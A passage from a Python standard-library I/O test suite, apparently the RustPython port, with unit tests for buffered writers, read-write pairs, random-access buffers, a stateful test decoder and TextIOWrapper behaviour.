# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
